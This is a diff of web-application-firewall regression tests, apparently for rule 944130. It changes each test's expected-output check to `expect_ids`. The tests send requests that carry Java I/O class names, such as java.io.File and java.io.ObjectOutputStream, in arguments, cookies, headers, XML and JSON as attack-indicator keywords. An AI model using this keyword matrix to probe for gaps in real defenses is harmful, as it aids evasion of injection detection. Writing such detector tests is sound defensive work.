@@ -1699,7 +1786,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.DataInputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 89 desc: "Argument test includes keyword java.io.File" stages: @@ -1718,7 +1806,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.File" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 90 desc: "Argument name includes keyword java.io.File" stages: @@ -1737,7 +1826,8 @@ tests: version: "HTTP/1.0" data: "java.io.File=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 91 desc: "Cookie test includes keyword java.io.File" stages: @@ -1757,7 +1847,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 92 desc: "Cookie name includes keyword java.io.File" stages: @@ -1777,7 +1868,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 93 desc: "Request header test includes keyword java.io.File" stages: @@ -1797,7 +1889,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 94 desc: "XML attribute value includes keyword java.io.File" stages: @@ -1816,7 +1909,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 95 desc: "XML element value includes keyword java.io.File" stages: @@ -1835,7 +1929,8 @@ tests: version: "HTTP/1.0" data: "java.io.File" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 96 desc: "Nested XML element value includes keyword java.io.File" stages: @@ -1854,7 +1949,8 @@ tests: version: "HTTP/1.0" data: "java.io.File" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 97 desc: "Content-Type text/plain includes keyword java.io.File" stages: 
@@ -1873,7 +1969,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.File" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 98 desc: "Content-Type application/json arg value includes keyword java.io.File" stages: @@ -1892,7 +1989,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.File\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 99 desc: "Content-Type application/json arg name includes keyword java.io.File" stages: @@ -1911,7 +2009,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.File\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 100 desc: "Argument test includes keyword java.io.FileOutputStream" stages: @@ -1930,7 +2029,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FileOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 101 desc: "Argument name includes keyword java.io.FileOutputStream" stages: @@ -1949,7 +2049,8 @@ tests: version: "HTTP/1.0" data: "java.io.FileOutputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 102 desc: "Cookie test includes keyword java.io.FileOutputStream" stages: @@ -1969,7 +2070,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 103 desc: "Cookie name includes keyword java.io.FileOutputStream" stages: @@ -1989,7 +2091,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 104 desc: "Request header test includes keyword java.io.FileOutputStream" stages: @@ -2009,7 +2112,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 105 desc: "XML attribute value includes keyword java.io.FileOutputStream" stages: 
@@ -2028,7 +2132,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 106 desc: "XML element value includes keyword java.io.FileOutputStream" stages: @@ -2047,7 +2152,8 @@ tests: version: "HTTP/1.0" data: "java.io.FileOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 107 desc: "Nested XML element value includes keyword java.io.FileOutputStream" stages: @@ -2066,7 +2172,8 @@ tests: version: "HTTP/1.0" data: "java.io.FileOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 108 desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" stages: @@ -2085,7 +2192,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FileOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 109 desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" stages: @@ -2104,7 +2212,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.FileOutputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 110 desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" stages: @@ -2123,7 +2232,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.FileOutputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 111 desc: "Argument test includes keyword java.io.FilterInputStream" stages: @@ -2142,7 +2252,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FilterInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 112 desc: "Argument name includes keyword java.io.FilterInputStream" stages: 
@@ -2161,7 +2272,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterInputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 113 desc: "Cookie test includes keyword java.io.FilterInputStream" stages: @@ -2181,7 +2293,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 114 desc: "Cookie name includes keyword java.io.FilterInputStream" stages: @@ -2201,7 +2314,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 115 desc: "Request header test includes keyword java.io.FilterInputStream" stages: @@ -2221,7 +2335,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 116 desc: "XML attribute value includes keyword java.io.FilterInputStream" stages: @@ -2240,7 +2355,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 117 desc: "XML element value includes keyword java.io.FilterInputStream" stages: @@ -2259,7 +2375,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 118 desc: "Nested XML element value includes keyword java.io.FilterInputStream" stages: @@ -2278,7 +2395,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 119 desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" stages: @@ -2297,7 +2415,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FilterInputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 120 desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" stages: 
@@ -2316,7 +2435,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.FilterInputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 121 desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" stages: @@ -2335,7 +2455,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.FilterInputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 122 desc: "Argument test includes keyword java.io.FilterOutputStream" stages: @@ -2354,7 +2475,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FilterOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 123 desc: "Argument name includes keyword java.io.FilterOutputStream" stages: @@ -2373,7 +2495,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterOutputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 124 desc: "Cookie test includes keyword java.io.FilterOutputStream" stages: @@ -2393,7 +2516,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 125 desc: "Cookie name includes keyword java.io.FilterOutputStream" stages: @@ -2413,7 +2537,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 126 desc: "Request header test includes keyword java.io.FilterOutputStream" stages: @@ -2433,7 +2558,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 127 desc: "XML attribute value includes keyword java.io.FilterOutputStream" stages: @@ -2452,7 +2578,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 128 desc: "XML element value includes keyword java.io.FilterOutputStream" stages: 
@@ -2471,7 +2598,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 129 desc: "Nested XML element value includes keyword java.io.FilterOutputStream" stages: @@ -2490,7 +2618,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 130 desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" stages: @@ -2509,7 +2638,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FilterOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 131 desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" stages: @@ -2528,7 +2658,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.FilterOutputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 132 desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" stages: @@ -2547,7 +2678,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.FilterOutputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 133 desc: "Argument test includes keyword java.io.FilterReader" stages: @@ -2566,7 +2698,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FilterReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 134 desc: "Argument name includes keyword java.io.FilterReader" stages: @@ -2585,7 +2718,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterReader=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 135 desc: "Cookie test includes keyword java.io.FilterReader" stages: 
@@ -2605,7 +2739,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 136 desc: "Cookie name includes keyword java.io.FilterReader" stages: @@ -2625,7 +2760,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 137 desc: "Request header test includes keyword java.io.FilterReader" stages: @@ -2645,7 +2781,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 138 desc: "XML attribute value includes keyword java.io.FilterReader" stages: @@ -2664,7 +2801,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 139 desc: "XML element value includes keyword java.io.FilterReader" stages: @@ -2683,7 +2821,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 140 desc: "Nested XML element value includes keyword java.io.FilterReader" stages: @@ -2702,7 +2841,8 @@ tests: version: "HTTP/1.0" data: "java.io.FilterReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 141 desc: "Content-Type text/plain includes keyword java.io.FilterReader" stages: @@ -2721,7 +2861,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.FilterReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 142 desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" stages: @@ -2740,7 +2881,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.FilterReader\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 143 desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" stages: 
@@ -2759,7 +2901,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.FilterReader\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 144 desc: "Argument test includes keyword java.io.InputStream" stages: @@ -2778,7 +2921,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.InputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 145 desc: "Argument name includes keyword java.io.InputStream" stages: @@ -2797,7 +2941,8 @@ tests: version: "HTTP/1.0" data: "java.io.InputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 146 desc: "Cookie test includes keyword java.io.InputStream" stages: @@ -2817,7 +2962,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 147 desc: "Cookie name includes keyword java.io.InputStream" stages: @@ -2837,7 +2983,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 148 desc: "Request header test includes keyword java.io.InputStream" stages: @@ -2857,7 +3004,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 149 desc: "XML attribute value includes keyword java.io.InputStream" stages: @@ -2876,7 +3024,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 150 desc: "XML element value includes keyword java.io.InputStream" stages: @@ -2895,7 +3044,8 @@ tests: version: "HTTP/1.0" data: "java.io.InputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 151 desc: "Nested XML element value includes keyword java.io.InputStream" stages: 
@@ -2914,7 +3064,8 @@ tests: version: "HTTP/1.0" data: "java.io.InputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 152 desc: "Content-Type text/plain includes keyword java.io.InputStream" stages: @@ -2933,7 +3084,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.InputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 153 desc: "Content-Type application/json arg value includes keyword java.io.InputStream" stages: @@ -2952,7 +3104,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.InputStream\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 154 desc: "Content-Type application/json arg name includes keyword java.io.InputStream" stages: @@ -2971,7 +3124,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.InputStream\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 155 desc: "Argument test includes keyword java.io.InputStreamReader" stages: @@ -2990,7 +3144,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.InputStreamReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 156 desc: "Argument name includes keyword java.io.InputStreamReader" stages: @@ -3009,7 +3164,8 @@ tests: version: "HTTP/1.0" data: "java.io.InputStreamReader=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 157 desc: "Cookie test includes keyword java.io.InputStreamReader" stages: @@ -3029,7 +3185,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 158 desc: "Cookie name includes keyword java.io.InputStreamReader" stages: @@ -3049,7 +3206,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 159 desc: "Request header test includes keyword java.io.InputStreamReader" stages: 
@@ -3069,7 +3227,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 160 desc: "XML attribute value includes keyword java.io.InputStreamReader" stages: @@ -3088,7 +3247,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 161 desc: "XML element value includes keyword java.io.InputStreamReader" stages: @@ -3107,7 +3267,8 @@ tests: version: "HTTP/1.0" data: "java.io.InputStreamReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 162 desc: "Nested XML element value includes keyword java.io.InputStreamReader" stages: @@ -3126,7 +3287,8 @@ tests: version: "HTTP/1.0" data: "java.io.InputStreamReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 163 desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" stages: @@ -3145,7 +3307,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.InputStreamReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 164 desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" stages: @@ -3164,7 +3327,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.InputStreamReader\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 165 desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" stages: @@ -3183,7 +3347,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.InputStreamReader\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 166 desc: "Argument test includes keyword java.io.LineNumberReader" stages: 
@@ -3202,7 +3367,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.LineNumberReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 167 desc: "Argument name includes keyword java.io.LineNumberReader" stages: @@ -3221,7 +3387,8 @@ tests: version: "HTTP/1.0" data: "java.io.LineNumberReader=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 168 desc: "Cookie test includes keyword java.io.LineNumberReader" stages: @@ -3241,7 +3408,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 169 desc: "Cookie name includes keyword java.io.LineNumberReader" stages: @@ -3261,7 +3429,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 170 desc: "Request header test includes keyword java.io.LineNumberReader" stages: @@ -3281,7 +3450,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 171 desc: "XML attribute value includes keyword java.io.LineNumberReader" stages: @@ -3300,7 +3470,8 @@ tests: version: "HTTP/1.0" data: "element_value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 172 desc: "XML element value includes keyword java.io.LineNumberReader" stages: @@ -3319,7 +3490,8 @@ tests: version: "HTTP/1.0" data: "java.io.LineNumberReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 173 desc: "Nested XML element value includes keyword java.io.LineNumberReader" stages: @@ -3338,7 +3510,8 @@ tests: version: "HTTP/1.0" data: "java.io.LineNumberReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 174 desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" stages: 
@@ -3357,7 +3530,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.LineNumberReader" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 175 desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" stages: @@ -3376,7 +3550,8 @@ tests: version: "HTTP/1.0" data: "{\"test\": \"java.io.LineNumberReader\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 176 desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" stages: @@ -3395,7 +3570,8 @@ tests: version: "HTTP/1.0" data: "{\"java.io.LineNumberReader\": \"test\"}" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 177 desc: "Argument test includes keyword java.io.ObjectOutputStream" stages: @@ -3414,7 +3590,8 @@ tests: version: "HTTP/1.0" data: "test=java.io.ObjectOutputStream" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 178 desc: "Argument name includes keyword java.io.ObjectOutputStream" stages: @@ -3433,7 +3610,8 @@ tests: version: "HTTP/1.0" data: "java.io.ObjectOutputStream=test" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 179 desc: "Cookie test includes keyword java.io.ObjectOutputStream" stages: @@ -3453,7 +3631,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 180 desc: "Cookie name includes keyword java.io.ObjectOutputStream" stages: @@ -3473,7 +3652,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 181 desc: "Request header test includes keyword java.io.ObjectOutputStream" stages: @@ -3493,7 +3673,8 @@ tests: version: "HTTP/1.0" data: "test=value" output: - log_contains: "id \"944130\"" + log: + expect_ids: [944130] - test_id: 182 desc: "XML attribute value includes keyword java.io.ObjectOutputStream" stages: 
@@ -3512,7 +3693,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 183
 desc: "XML element value includes keyword java.io.ObjectOutputStream"
 stages:
@@ -3531,7 +3713,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.ObjectOutputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 184
 desc: "Nested XML element value includes keyword java.io.ObjectOutputStream"
 stages:
@@ -3550,7 +3733,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.ObjectOutputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 185
 desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream"
 stages:
@@ -3569,7 +3753,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.ObjectOutputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 186
 desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream"
 stages:
@@ -3588,7 +3773,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.io.ObjectOutputStream\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 187
 desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream"
 stages:
@@ -3607,7 +3793,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.io.ObjectOutputStream\": \"test\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 188
 desc: "Argument test includes keyword java.io.OutputStream"
 stages:
@@ -3626,7 +3813,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.OutputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 189
 desc: "Argument name includes keyword java.io.OutputStream"
 stages:
@@ -3645,7 +3833,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.OutputStream=test"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 190
 desc: "Cookie test includes keyword java.io.OutputStream"
 stages:
@@ -3665,7 +3854,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 191
 desc: "Cookie name includes keyword java.io.OutputStream"
 stages:
@@ -3685,7 +3875,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 192
 desc: "Request header test includes keyword java.io.OutputStream"
 stages:
@@ -3705,7 +3896,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 193
 desc: "XML attribute value includes keyword java.io.OutputStream"
 stages:
@@ -3724,7 +3916,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 194
 desc: "XML element value includes keyword java.io.OutputStream"
 stages:
@@ -3743,7 +3936,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.OutputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 195
 desc: "Nested XML element value includes keyword java.io.OutputStream"
 stages:
@@ -3762,7 +3956,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.OutputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 196
 desc: "Content-Type text/plain includes keyword java.io.OutputStream"
 stages:
@@ -3781,7 +3976,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.OutputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 197
 desc: "Content-Type application/json arg value includes keyword java.io.OutputStream"
 stages:
@@ -3800,7 +3996,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.io.OutputStream\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 198
 desc: "Content-Type application/json arg name includes keyword java.io.OutputStream"
 stages:
@@ -3819,7 +4016,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.io.OutputStream\": \"test\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 199
 desc: "Argument test includes keyword java.io.PipedOutputStream"
 stages:
@@ -3838,7 +4036,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.PipedOutputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 200
 desc: "Argument name includes keyword java.io.PipedOutputStream"
 stages:
@@ -3857,7 +4056,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.PipedOutputStream=test"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 201
 desc: "Cookie test includes keyword java.io.PipedOutputStream"
 stages:
@@ -3877,7 +4077,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 202
 desc: "Cookie name includes keyword java.io.PipedOutputStream"
 stages:
@@ -3897,7 +4098,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 203
 desc: "Request header test includes keyword java.io.PipedOutputStream"
 stages:
@@ -3917,7 +4119,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 204
 desc: "XML attribute value includes keyword java.io.PipedOutputStream"
 stages:
@@ -3936,7 +4139,8 @@ tests:
 version: "HTTP/1.0"
 data: "element_value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 205
 desc: "XML element value includes keyword java.io.PipedOutputStream"
 stages:
@@ -3955,7 +4159,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.PipedOutputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 206
 desc: "Nested XML element value includes keyword java.io.PipedOutputStream"
 stages:
@@ -3974,7 +4179,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.PipedOutputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 207
 desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream"
 stages:
@@ -3993,7 +4199,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.PipedOutputStream"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 208
 desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream"
 stages:
@@ -4012,7 +4219,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"test\": \"java.io.PipedOutputStream\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 209
 desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream"
 stages:
@@ -4031,7 +4239,8 @@ tests:
 version: "HTTP/1.0"
 data: "{\"java.io.PipedOutputStream\": \"test\"}"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 210
 desc: "Argument test includes keyword java.io.PipedReader"
 stages:
@@ -4050,7 +4259,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=java.io.PipedReader"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 211
 desc: "Argument name includes keyword java.io.PipedReader"
 stages:
@@ -4069,7 +4279,8 @@ tests:
 version: "HTTP/1.0"
 data: "java.io.PipedReader=test"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 212
 desc: "Cookie test includes keyword java.io.PipedReader"
 stages:
@@ -4089,7 +4300,8 @@ tests:
 version: "HTTP/1.0"
 data: "test=value"
 output:
- log_contains: "id \"944130\""
+ log:
+ expect_ids: [944130]
 - test_id: 213
 desc: "Cookie name includes keyword java.io.PipedReader"
 stages:
@@ -4109,7 +4321,8 @@ tests:
